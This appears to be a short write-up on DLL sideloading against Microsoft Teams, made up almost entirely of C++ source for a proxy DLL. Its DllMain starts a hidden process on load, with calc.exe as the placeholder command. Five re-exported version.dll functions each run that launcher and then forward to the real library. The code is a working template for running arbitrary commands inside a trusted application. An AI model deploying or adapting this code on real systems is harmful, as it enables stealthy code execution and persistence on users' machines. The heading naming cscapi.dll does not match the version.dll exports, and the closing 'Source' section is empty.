
## Target

- `%LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe` loads `version.dll`
- `%LOCALAPPDATA%\Microsoft\Teams\current\Teams.exe` loads `cscapi.dll`

## `cscapi.dll`

In this case we start from `DllMain`, with boilerplate as simple as the following:

```cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

// Size in bytes of the command-line buffer below.
#define MAX_LEN 1024 
// Command line handed to CreateProcessA by LaunchMyShellcode(). The buffer is
// a mutable global; the trailing "\0" in the literal is redundant because the
// string literal is already NUL-terminated.
char processCommandLine[MAX_LEN] = "calc.exe\0";
// Latch that makes LaunchMyShellcode() a no-op after its first call. It is a
// plain bool; no synchronization is visible in this listing.
bool onlyOnce = false;

// Starts the command line stored in processCommandLine as a new process,
// at most once per load of this module.
//
// Despite its name, this function runs no shellcode: it only calls
// CreateProcessA with CREATE_NO_WINDOW and handle inheritance enabled.
// The new process is therefore a child of whichever process loaded this DLL,
// so a process-creation event with that parent is the artifact this call
// leaves behind. The CreateProcessA result is not inspected.
void LaunchMyShellcode()
{
    if (!onlyOnce)
    {
        // Set the latch before doing any work so later calls return at once.
        onlyOnce = true;

        // Force termination in case the buffer was filled to capacity.
        processCommandLine[MAX_LEN - 1] = 0;

        // Both structures start zeroed; only the size field is filled in.
        STARTUPINFOA startupInfo{};
        PROCESS_INFORMATION processInfo{};
        startupInfo.cb = sizeof(startupInfo);

        ::CreateProcessA(
            nullptr,                // application name: taken from the command line
            processCommandLine,     // command line to run
            nullptr,                // default process security attributes
            nullptr,                // default thread security attributes
            true,                   // child inherits inheritable handles
            CREATE_NO_WINDOW,       // no console window for the child
            nullptr,                // inherit the parent's environment
            nullptr,                // inherit the parent's working directory
            &startupInfo,
            &processInfo
        );
    }
}

// DLL entry point. On DLL_PROCESS_ATTACH it calls LaunchMyShellcode(), so the
// process launch happens as soon as the module is loaded, from inside DllMain
// and before any export is called. Every other notification is ignored.
// Always returns TRUE.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        LaunchMyShellcode();
        break;
    default:
        // Thread attach/detach and process detach need no handling here.
        break;
    }

    return TRUE;
}
```

## Exports

```cpp
    
// Linker export directives of the form /EXPORT:<public name>=<internal name>.
// Each one publishes a version.dll API name from this module and binds it to
// the matching my_* function defined below, so a caller importing these five
// names by name receives the stand-in functions.
#pragma comment(linker,"/EXPORT:GetFileVersionInfoExW=my_GetFileVersionInfoExW")
#pragma comment(linker,"/EXPORT:GetFileVersionInfoSizeExW=my_GetFileVersionInfoSizeExW")
#pragma comment(linker,"/EXPORT:GetFileVersionInfoSizeW=my_GetFileVersionInfoSizeW")
#pragma comment(linker,"/EXPORT:GetFileVersionInfoW=my_GetFileVersionInfoW")
#pragma comment(linker,"/EXPORT:VerQueryValueW=my_VerQueryValueW")

extern "C" {
    // Stand-in published as GetFileVersionInfoExW by the /EXPORT directive.
    // Calls LaunchMyShellcode() first, then looks up the function of the same
    // name with LoadLibraryA("version.dll") + GetProcAddress and passes every
    // argument through unchanged, returning the callee's result.
    // Neither the module handle nor the resolved pointer is checked.
    BOOL CALLBACK my_GetFileVersionInfoExW(
        DWORD   dwFlags,
        LPCWSTR lpwstrFilename,
        DWORD   dwHandle,
        DWORD   dwLen,
        LPVOID  lpData
    )
    {
        LaunchMyShellcode();

        using ForwardFn = BOOL(WINAPI*)(DWORD, LPCWSTR, DWORD, DWORD, LPVOID);

        auto versionModule = LoadLibraryA("version.dll");
        auto rawTarget = GetProcAddress(versionModule, "GetFileVersionInfoExW");
        auto forward = reinterpret_cast<ForwardFn>(rawTarget);

        return forward(dwFlags, lpwstrFilename, dwHandle, dwLen, lpData);
    }

    // Stand-in published as GetFileVersionInfoSizeExW by the /EXPORT directive.
    // Calls LaunchMyShellcode() first, then looks up the function of the same
    // name with LoadLibraryA("version.dll") + GetProcAddress and passes every
    // argument through unchanged, returning the callee's result.
    // Neither the module handle nor the resolved pointer is checked.
    DWORD CALLBACK my_GetFileVersionInfoSizeExW(
        DWORD   dwFlags,
        LPCWSTR lpwstrFilename,
        LPDWORD lpdwHandle
    )
    {
        LaunchMyShellcode();

        using ForwardFn = DWORD(WINAPI*)(DWORD, LPCWSTR, LPDWORD);

        auto versionModule = LoadLibraryA("version.dll");
        auto rawTarget = GetProcAddress(versionModule, "GetFileVersionInfoSizeExW");
        auto forward = reinterpret_cast<ForwardFn>(rawTarget);

        return forward(dwFlags, lpwstrFilename, lpdwHandle);
    }

    // Stand-in published as GetFileVersionInfoSizeW by the /EXPORT directive.
    // Calls LaunchMyShellcode() first, then looks up the function of the same
    // name with LoadLibraryA("version.dll") + GetProcAddress and passes every
    // argument through unchanged, returning the callee's result.
    // Neither the module handle nor the resolved pointer is checked.
    DWORD CALLBACK my_GetFileVersionInfoSizeW(
        LPCWSTR lptstrFilename,
        LPDWORD lpdwHandle
    )
    {
        LaunchMyShellcode();

        using ForwardFn = DWORD(WINAPI*)(LPCWSTR, LPDWORD);

        auto versionModule = LoadLibraryA("version.dll");
        auto rawTarget = GetProcAddress(versionModule, "GetFileVersionInfoSizeW");
        auto forward = reinterpret_cast<ForwardFn>(rawTarget);

        return forward(lptstrFilename, lpdwHandle);
    }

    // Stand-in published as GetFileVersionInfoW by the /EXPORT directive.
    // Calls LaunchMyShellcode() first, then looks up the function of the same
    // name with LoadLibraryA("version.dll") + GetProcAddress and passes every
    // argument through unchanged, returning the callee's result.
    // Neither the module handle nor the resolved pointer is checked.
    BOOL CALLBACK my_GetFileVersionInfoW(
        LPCWSTR lptstrFilename,
        DWORD   dwHandle,
        DWORD   dwLen,
        LPVOID  lpData
    )
    {
        LaunchMyShellcode();

        using ForwardFn = BOOL(WINAPI*)(LPCWSTR, DWORD, DWORD, LPVOID);

        auto versionModule = LoadLibraryA("version.dll");
        auto rawTarget = GetProcAddress(versionModule, "GetFileVersionInfoW");
        auto forward = reinterpret_cast<ForwardFn>(rawTarget);

        return forward(lptstrFilename, dwHandle, dwLen, lpData);
    }

    // Stand-in published as VerQueryValueW by the /EXPORT directive.
    // Calls LaunchMyShellcode() first, then looks up the function of the same
    // name with LoadLibraryA("version.dll") + GetProcAddress and passes every
    // argument through unchanged, returning the callee's result.
    // Neither the module handle nor the resolved pointer is checked.
    BOOL CALLBACK my_VerQueryValueW(
        LPCVOID pBlock,
        LPCWSTR lpSubBlock,
        LPVOID* lplpBuffer,
        PUINT   puLen
    )
    {
        LaunchMyShellcode();

        using ForwardFn = BOOL(WINAPI*)(LPCVOID, LPCWSTR, LPVOID*, PUINT);

        auto versionModule = LoadLibraryA("version.dll");
        auto rawTarget = GetProcAddress(versionModule, "VerQueryValueW");
        auto forward = reinterpret_cast<ForwardFn>(rawTarget);

        return forward(pBlock, lpSubBlock, lplpBuffer, puLen);
    }
}
```

## Source
